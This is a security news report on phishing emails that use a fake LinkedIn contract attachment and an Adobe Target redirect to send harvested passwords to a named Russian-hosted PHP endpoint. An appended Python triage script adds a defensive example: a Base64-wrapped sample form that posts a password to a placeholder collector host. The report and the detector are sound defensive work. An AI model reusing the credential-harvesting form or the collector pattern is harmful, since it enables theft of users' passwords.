Adobe Target redirect used to steal LinkedIn passwords
Phishing emails with a fake LinkedIn contract use an Adobe Target redirect to capture passwords, send them to a Russian server and then route victims to LinkedIn.
Cybercriminals sent phishing emails that included a fake LinkedIn contract attachment and used an Adobe Target redirect to harvest passwords, forward them to a Russian server and then send victims to the real LinkedIn site.
The messages were presented as business inquiries and carried an attachment labeled as a PDF but saved with a double extension such as “.pdf.html”. Email details often did not match: sender name, address and signature were inconsistent; the named company existed but not in the sender’s country; and the named individual did not appear to work at the claimed company. One sample message read: “I would like to do business with you via LinkedIn. I’m a buyer. Please find attached the signed contract No. #33110:12000pcs. I look forward to hearing from you.”
The attachment was an HTML file that executed a heavily obfuscated JavaScript payload. The script used URL encoding and two Base64-encoded sections and produced a simple login form. The form displayed a hardcoded recipient email address that users could not edit.
Network analysis showed the script routing victims through an Adobe Target delivery URL: https://lnkd.tt.omtrdc.net/rest/v1/delivery. Researchers determined the Adobe Target endpoint served as a redirect and tracking point rather than as the credential receiver. After deobfuscation, the form submitted credentials by HTTP POST to a PHP script on a Russian-hosted server at http://a1263367.xsph.ru/taam/Ln.php. The POST included a parameter carrying the hardcoded email address and another carrying the password entered by the victim. The PHP handler then redirected the user to business.linkedin.com.
Security tools detected the campaign and Malwarebytes’ Scam Guard flagged the malicious message. Recommended precautions include accessing accounts through official apps or by typing the site address directly, checking file extensions before opening attachments, enabling multi-factor authentication on important accounts and running up-to-date anti-malware with web protection. Tools that flag suspicious emails and attachments can help block messages before users interact with them.
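As an added illustration of the attachment checks described above (this code is not from the original article or from any vendor tool), the following Python sketch statically triages one attachment for the traits seen in this campaign: a document-style double extension such as “.pdf.html”, URL-encoded or Base64-encoded content, and a decoded password form that posts to an untrusted host. The function names, finding labels, the `trusted_hosts` parameter and the placeholder host `collector.example.invalid` are assumptions made for the example, and it assumes the decoded markup carries a `<form action=...>` attribute.

```python
import base64
import re
from urllib.parse import unquote, urlparse

DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx"}   # what the recipient expects
ACTIVE_EXTS = {"html", "htm", "shtml", "xhtml"}      # what actually gets opened
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FORM_ACTION = re.compile(r"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
PASSWORD_INPUT = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)

def peel(text, depth=3):
    """Statically undo nested URL encoding and Base64; never executes script."""
    seen, queue = [], [text]
    for _ in range(depth):
        decoded = []
        for layer in queue:
            layer = unquote(layer)
            seen.append(layer)
            for run in B64_RUN.findall(layer):
                try:
                    raw = base64.b64decode(run + "=" * (-len(run) % 4))
                    decoded.append(raw.decode("utf-8", "ignore"))
                except ValueError:   # run was not valid Base64 after all
                    pass
        queue = decoded
    return "\n".join(seen)

def triage(filename, body, trusted_hosts=()):
    """Return heuristic findings for one attachment (file name + raw bytes)."""
    findings = []
    parts = filename.lower().split(".")
    if len(parts) >= 3 and parts[-1] in ACTIVE_EXTS and parts[-2] in DECOY_EXTS:
        findings.append("double-extension")
    text = body.decode("utf-8", "ignore")
    if "%3C" in text.upper() or B64_RUN.search(text):
        findings.append("encoded-content")
    flat = peel(text)
    if PASSWORD_INPUT.search(flat):
        findings.append("password-field")
        for action in FORM_ACTION.findall(flat):
            host = urlparse(action).hostname
            if host and host not in trusted_hosts:
                findings.append("external-form-action:" + host)
    return findings

# Constructed sample: a Base64-wrapped form pointing at a placeholder host.
FORM_HTML = ('<form method="post" action="http://collector.example.invalid/in.php">'
             '<input type="password" name="pw"></form>')
SAMPLE = ("<html><script>document.write(atob('"
          + base64.b64encode(FORM_HTML.encode()).decode() + "'))</script></html>").encode()
```

Calling `triage("Contract.pdf.html", SAMPLE)` returns all four findings for the constructed sample; these are triage heuristics for a mail gateway or analyst queue, not a verdict on their own.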








